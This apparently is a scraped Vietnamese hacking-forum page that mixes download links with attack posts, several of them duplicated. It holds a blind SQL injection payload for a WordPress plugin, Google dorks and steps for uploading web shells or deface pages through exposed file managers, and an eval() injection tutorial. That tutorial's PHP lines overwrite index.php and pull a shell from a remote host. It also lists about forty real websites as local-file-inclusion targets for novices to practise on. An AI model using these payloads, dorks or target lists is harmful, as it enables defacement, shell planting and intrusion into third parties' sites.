[Software] Tool Scan XSS
http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb
Xem Thêm
WordPress MoodThingy Widget v0.8.7 Blind SQL Injection
# Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection
# Date: 7/2/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://www.moodthingy.com/
# Software Link: http://downloads.wordpress.org/plugi...dget.0.8.7.zip
# Version: 0.8.7
=====================
Vulnerability Details
=====================
Input data from the form submission is not properly sanitized.
Using blind SQL injection techniques, true statements will result in the rating being updated, while false statements will cause the plugin to hang.
=================
Injection Example
=================
Using Burp Suite or other proxy, intercept the post request when submitting the form and append and 1=1 to the postID parameter before forwarding.
True statement example:
action=cast_vote&token=d9ad983425&moodthingyvote=6 &postID=6 and 1=1&results_div_id=voteresults
In the example above, the request will process successfully and the rating will be updated accordingly.
By replacing 1=1 with 1=0, the plugin will hang and the process will never successfully complete, giving you the necessary true/false conditions for blind sql injections.
# Date: 7/2/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://www.moodthingy.com/
# Software Link: http://downloads.wordpress.org/plugi...dget.0.8.7.zip
# Version: 0.8.7
=====================
Vulnerability Details
=====================
Input data from the form submission is not properly sanitized.
Using blind SQL injection techniques, true statements will result in the rating being updated, while false statements will cause the plugin to hang.
=================
Injection Example
=================
Using Burp Suite or other proxy, intercept the post request when submitting the form and append and 1=1 to the postID parameter before forwarding.
True statement example:
action=cast_vote&token=d9ad983425&moodthingyvote=6 &postID=6 and 1=1&results_div_id=voteresults
In the example above, the request will process successfully and the rating will be updated accordingly.
By replacing 1=1 with 1=0, the plugin will hang and the process will never successfully complete, giving you the necessary true/false conditions for blind sql injections.
Xem Thêm
HTML Editor File Upload Exploit
This is a exploit which can be used to upload .JPG and .TXT on the website
Dork: inurl:/HTMLEditor/editor/
"inurl:/HTMLEditor/editor//filemanager/"
"inurl:/HTMLEditor/editor//filemanager//connectors/"
http://www.gofastrchobbies.com/imagesupload/cms_files/Hacking%20Exposed.png
Dork: inurl:/HTMLEditor/editor/
"inurl:/HTMLEditor/editor//filemanager/"
"inurl:/HTMLEditor/editor//filemanager//connectors/"
Use any one above mentioned dork.
Vulnerable URL: http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Now under:
| Select the "File Uploader" to use Change the type to PHP. Choose your file. Click on Send it to the Server to upload your file. If uploaded sucessfully, you will get a message saying "File uploaded without any error" After the uploading process. In the right hand side see the Uploaded File URL. From there see your uploded file :D Demo website: |
Xem Thêm
"File Manager" Remote Shell and Deface Upload Vulnerability.
Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.
Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
Now delete the text after filemanager. Now after deleteing the text URL will be
http://www.site.com/filemanager/
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
Xem Thêm
Eval() Vulnerability & Exploitation
File: Eval() Vulnerability & Exploitation
Author: GlaDiaT0R
Hits: 859
date: 2010-05-04
Author: GlaDiaT0R
Hits: 859
date: 2010-05-04
##############################################################################
# [+]Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About :
##############################################################################
# Written by : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team ( DarkGh0st.Net )
##############################################################################
# [+] Summary:
# [1]-Introduction
# [2]-Detection
# [3]-Vulnerable Source code
# [4]-Exploiting..
##############################################################################
[1]-Introduction
eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.
=======================================================
[2]-Detection
PoC 1 :
http://www.vulnsite.com/evalinject.php?ev=<? phpinfo(); ?>
[ eval() execute the contents of the variable "ev" as PHP code ]
----------
PoC 2 :
http://www.vulnsite.com/evalinject.php?ev=phpinfo();
[ eval() execute the contents of the variable "ev" as PHP code (without tags) ]
----------
PoC 3 :
Changing the header or POST variable cited by: phpinfo () [or <? phpinfo ();> php code used . ]
(With the Tamper Data)
[ eval () execute a chain whose variable $ HTTP_USER_AGENT is so just
change your header in PHP code ]
=======================================================
[3]-Vulnerable Source code
PoC 1 :
<?php
$Ev = $_GET['ev'];
$string = ($Ev);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>
----------
PoC 2 :
<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>
----------
PoC 3 :
<?php
$string = stripslashes($HTTP_USER_AGENT);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>
=======================================================
[4]-Exploiting..
----------
Write or Create a page containing : Hacked by ...
<?php $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ?>
or
$z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z);
----------
To insert a remote page include using an url
<?php include('http://www.website.com/shell.txt'); ?>
or
include('http://www.website.com/shell.txt');
----------
Insertion of a distant code in the vulnerable website
<?php $z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z); ?>
or
$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z);
----------
Thank you for your attention. I hope you understood the process to exploit the eval () vulnerability .
Xem Thêm
[Ebook] Tổng hợp các bài tham luận tại tetcon 2012
1. Phát hiện lỗi phần mềm thông qua kỹ thuật Fuzzing thông minh-Phạm Văn Toàn
http://www.mediafire.com/?k2z717z9m2trld8
2. Những lỗ hổng ít được biết đến và cách phòng chống-Dương Ngọc Thái
http://www.mediafire.com/?pimdtbwl4natj02
3. Mua hàng không mất tiền lỗ hổng trong hệ thống thanh toán trực tuyến tại Việt Nam-Nhâm Xuân Nam
http://www.mediafire.com/?725js96xcbdrw2s
4.Tấm công sandbox và sử dụng AV làm tấm lá chắn bảo về malware- Nguyễn Phố Sơn
http://www.mediafire.com/?96hygetazz2dadn
5.Tấn Công Beats-Juliano Rizzo
http://www.mediafire.com/?y527u8va0x67v5m
6. Hai kỹ thuật tối ưu tấn công Blind SQL Injection- Nguyễn Hoàng Thịnh
http://www.mediafire.com/?jri611fdfude74r
http://www.mediafire.com/?k2z717z9m2trld8
2. Những lỗ hổng ít được biết đến và cách phòng chống-Dương Ngọc Thái
http://www.mediafire.com/?pimdtbwl4natj02
3. Mua hàng không mất tiền lỗ hổng trong hệ thống thanh toán trực tuyến tại Việt Nam-Nhâm Xuân Nam
http://www.mediafire.com/?725js96xcbdrw2s
4.Tấm công sandbox và sử dụng AV làm tấm lá chắn bảo về malware- Nguyễn Phố Sơn
http://www.mediafire.com/?96hygetazz2dadn
5.Tấn Công Beats-Juliano Rizzo
http://www.mediafire.com/?y527u8va0x67v5m
6. Hai kỹ thuật tối ưu tấn công Blind SQL Injection- Nguyễn Hoàng Thịnh
http://www.mediafire.com/?jri611fdfude74r
Xem Thêm
Video book khổng lồ về lập trình và tin học
Bộ video book tổng hợp khá đầy đủ các giáo trình về tin học, lập trình.
Trong link có giáo trình PHP, C, SQL... và còn rất rất nhiều nữa anh em
mở link ra xem sẽ rõ. Giáo trình được thực hiện bằng video nên dễ hiểu
và trực quan hơn đọc ebook.
Share cho anh em nhất là các anh em đang bắt đầu học code.
Link download:
http://www.mediafire.com/?t1ze73nafc37q
Share cho anh em nhất là các anh em đang bắt đầu học code.
Link download:
http://www.mediafire.com/?t1ze73nafc37q
Xem Thêm
Auto Clicker 3.0 [No Virus]
Free Mouse Auto Clicker 3.0
Free Mouse Auto Clicker 3.0 là phần mềm giúp bạn tự động click (Auto Click) vào 1 nơi bất kỳ trên màn hình mà không cần phải ngồi bấm chuột.
Hướng dẫn sử dụng:
Sau khi khởi động chương trình,
1. Bạn thiết lập thời gian giãn cách tại mục Click Interval.
2. Click Options là nơi bạn thiết lập sẽ tự động click chột trái hay chuột phải, click 1 cái hay click đúp
3. Ở mục Click Hotkey, bạn có thể thiết lập phím tắt sẽ bắt đầu tự động click và phím tắt ngưng tự động click
4. Bấm start để bắt đầu hoặc có thể dùng phím tắt đã thiết lập ở mục Click Hotkey.
5. Sau khi start thì bạn rê con chuột đi bất cứ vị trí nào trên màn hình thì nó sẽ tự động click liên tục ở vị trí đó (Thời gian giãn cách giữa 2 click phụ thuộc vào bạn thiết lập ở "Click Interval" thế nào).
6. Nếu bạn không muốn auto click nữa thì click vào nút Stop hoặc bấm phím tắt đã thiết lập ở Click Hotkey
Download:
http://sinhvienit.net/@forum/attachm...ickerSetup.rar
Kết quả kiểm tra Virus trên virustotal.com
| SHA256: | 1563c8d90c3fc85b6b741d51df74caf94f1783028e35005294 fe17a95fd99eac |
| SHA1: | 09036ddbd6a90cc872e06eb4b56336de81c000bb |
| MD5: | 2aded45593b0d1377474808a129b6032 |
| File size: | 458.0 KB ( 468946 bytes ) |
| File name: | FreeMouseAutoClickerSetup.exe |
| File type: | Win32 EXE |
| Tags: | peexe |
| Detection ratio: | 0 / 37 |
| Antivirus | Result | Update |
|---|---|---|
| AhnLab-V3 | - | 20120922 |
| AntiVir | - | 20120922 |
| Antiy-AVL | - | 20120911 |
| Avast | - | 20120922 |
| AVG | - | 20120922 |
| BitDefender | - | 20120922 |
| ByteHero | - | 20120922 |
| CAT-QuickHeal | - | 20120922 |
| ClamAV | - | 20120922 |
| Commtouch | - | 20120922 |
| Comodo | - | 20120922 |
| DrWeb | - | 20120922 |
| Emsisoft | - | 20120919 |
| ESET-NOD32 | - | 20120922 |
| F-Prot | - | 20120922 |
| Fortinet | - | 20120922 |
| GData | - | 20120922 |
| Ikarus | - | 20120922 |
| Jiangmin | - | 20120922 |
| K7AntiVirus | - | 20120921 |
| Kaspersky | - | 20120922 |
| McAfee | - | 20120922 |
| McAfee-GW-Edition | - | 20120922 |
| Microsoft | - | 20120922 |
| Norman | - | 20120922 |
| nProtect | - | 20120921 |
| PCTools | - | 20120922 |
| Sophos | - | 20120922 |
| SUPERAntiSpyware | - | 20120911 |
| Symantec | - | 20120922 |
| TheHacker | - | 20120920 |
| TotalDefense | - | 20120921 |
| TrendMicro | - | 20120922 |
| TrendMicro-HouseCall | - | 20120922 |
| VBA32 | - | 20120921 |
| VIPRE | - | 20120922 |
| ViRobot | - | 20120922 |
Xem Thêm
list site dính LFI cho nb thực hành :)
0. http://modelspromo.com/index.php?page=[LFI]
1. http://www.erp4biz.com/index.php?isi=[LFI]
2. http://www.scorpionsports.eu/website/index.php?page=[LFI]
3. http://www.asientoshm.com/index.php?page=[LFI]
4. http://www.hawaiianshirtshi.com/index.php?file=[LFI]
5. http://www.friocam.com.ar/index.php?page=[LFI]
6. http://www.sintraems.org.br/main.php?pg=[LFI]
7. http://www.lpr-andrecitroen-marly.fr/index.php?page=[LFI]
8. http://www.delcroix.fr/index.php?page=[LFI]
9. http://www.eqe-expert.com/index.php?lien=[LFI]
10. http://www.msap.centre-de-ressources.fr/index.php?page=[LFI]
11. http://www.ecm-france.com/fr/display.php?filename=[LFI]
12. http://www.bornthinker.com/template.php?page=[LFI]
13. http://www.traildumont.be/index.php?page=[LFI]
14. http://www.arsmb.com/index.php?fname=[LFI]
15. http://www.ski-chardonbleu.com/index.php?fname=[LFI]
16. http://www.tjeffschool.org/index.php?filename=[LFI]
17. http://www.afriquest.com/index.php?filename=[LFI]
18. http://lowcountryplantations.org/index.php?filename=[LFI]
19. http://www.museodellosplendore.it/index.php?filename=[LFI]
20. http://www.plc.com.la/index.php?viewFile=[LFI]
21. http://www.bht.org.uk/index.php?dir=[LFI]
22. http://www.tasha9503.com/tasha9503.ca/index.php?file=[LFI]
23 - http://www.vcsm.in/index.php?file=[LFI]
24 - http://www.pluie-d-etoiles.com/index.php?file=[LFI]
25 - http://www.vcsm.in/index.php?file=[LFI]
26 - http://www.charger-camera.co.uk/index.php?filename=[LFI]
27 - http://www.cyanbs.com/clients/ast/index.php?filename=[LFI]
28 - http://www.akkafassociates.com/index.php?filename=[LFI]
29 - http://www.webpublishingexperts.com/gene...?filename=[LFI]
30 - http://www.helpdesk.planmagic.com/index....lude_file=[LFI]
31 - http://www.alphametalurgica.com.br/index.php?require=[LFI]
32 - http://www.anglojales.g12.br/index.php?require=[LFI]
33 - http://www.linearredo.com/index.php?require=[LFI]
33 - http://www.jornaldejales.com.br/index.php?require=[LFI]
34 - http://www.chambermusicinternational.org....php?main=[LFI]
35 - http://www.modelspromo.com/index.php?page=[LFI]
36 - http://www.bankingonly.com/index.php?page=[LFI]
37 - http://www.qcivalves.com/index.php?page=[LFI]
38 - http://www.rinaldaclairvoyance2000.com/u....php?page=[LFI]
39 - http://www.looking-better.com/index.php?page=[LFI]
40 - http://ucragn.com/index.php?page=[LFI]
Nguồn: HF
1. http://www.erp4biz.com/index.php?isi=[LFI]
2. http://www.scorpionsports.eu/website/index.php?page=[LFI]
3. http://www.asientoshm.com/index.php?page=[LFI]
4. http://www.hawaiianshirtshi.com/index.php?file=[LFI]
5. http://www.friocam.com.ar/index.php?page=[LFI]
6. http://www.sintraems.org.br/main.php?pg=[LFI]
7. http://www.lpr-andrecitroen-marly.fr/index.php?page=[LFI]
8. http://www.delcroix.fr/index.php?page=[LFI]
9. http://www.eqe-expert.com/index.php?lien=[LFI]
10. http://www.msap.centre-de-ressources.fr/index.php?page=[LFI]
11. http://www.ecm-france.com/fr/display.php?filename=[LFI]
12. http://www.bornthinker.com/template.php?page=[LFI]
13. http://www.traildumont.be/index.php?page=[LFI]
14. http://www.arsmb.com/index.php?fname=[LFI]
15. http://www.ski-chardonbleu.com/index.php?fname=[LFI]
16. http://www.tjeffschool.org/index.php?filename=[LFI]
17. http://www.afriquest.com/index.php?filename=[LFI]
18. http://lowcountryplantations.org/index.php?filename=[LFI]
19. http://www.museodellosplendore.it/index.php?filename=[LFI]
20. http://www.plc.com.la/index.php?viewFile=[LFI]
21. http://www.bht.org.uk/index.php?dir=[LFI]
22. http://www.tasha9503.com/tasha9503.ca/index.php?file=[LFI]
23 - http://www.vcsm.in/index.php?file=[LFI]
24 - http://www.pluie-d-etoiles.com/index.php?file=[LFI]
25 - http://www.vcsm.in/index.php?file=[LFI]
26 - http://www.charger-camera.co.uk/index.php?filename=[LFI]
27 - http://www.cyanbs.com/clients/ast/index.php?filename=[LFI]
28 - http://www.akkafassociates.com/index.php?filename=[LFI]
29 - http://www.webpublishingexperts.com/gene...?filename=[LFI]
30 - http://www.helpdesk.planmagic.com/index....lude_file=[LFI]
31 - http://www.alphametalurgica.com.br/index.php?require=[LFI]
32 - http://www.anglojales.g12.br/index.php?require=[LFI]
33 - http://www.linearredo.com/index.php?require=[LFI]
33 - http://www.jornaldejales.com.br/index.php?require=[LFI]
34 - http://www.chambermusicinternational.org....php?main=[LFI]
35 - http://www.modelspromo.com/index.php?page=[LFI]
36 - http://www.bankingonly.com/index.php?page=[LFI]
37 - http://www.qcivalves.com/index.php?page=[LFI]
38 - http://www.rinaldaclairvoyance2000.com/u....php?page=[LFI]
39 - http://www.looking-better.com/index.php?page=[LFI]
40 - http://ucragn.com/index.php?page=[LFI]
Nguồn: HF
Xem Thêm
Video hướng dẫn cài đặt SQL Server 2008
Hướng dẫn cài SQL Server 2008 cho mọi người.
Tại mình thấy hôm trước trên sbox VHB có một mem của vhb kêu là không cài được SQL Server. Sau đây là Video hướng dẫn cài Từ A->Z cho AE.
Hướng dẫn cài đặt SQL Server 2008 nhé (hơn 8Mb nén).
Link: http://www.mediafire.com/?ypq2pnapdr75fu2
pass: vhb
Nguồn : VHB
Tại mình thấy hôm trước trên sbox VHB có một mem của vhb kêu là không cài được SQL Server. Sau đây là Video hướng dẫn cài Từ A->Z cho AE.
Hướng dẫn cài đặt SQL Server 2008 nhé (hơn 8Mb nén).
Link: http://www.mediafire.com/?ypq2pnapdr75fu2
pass: vhb
Nguồn : VHB
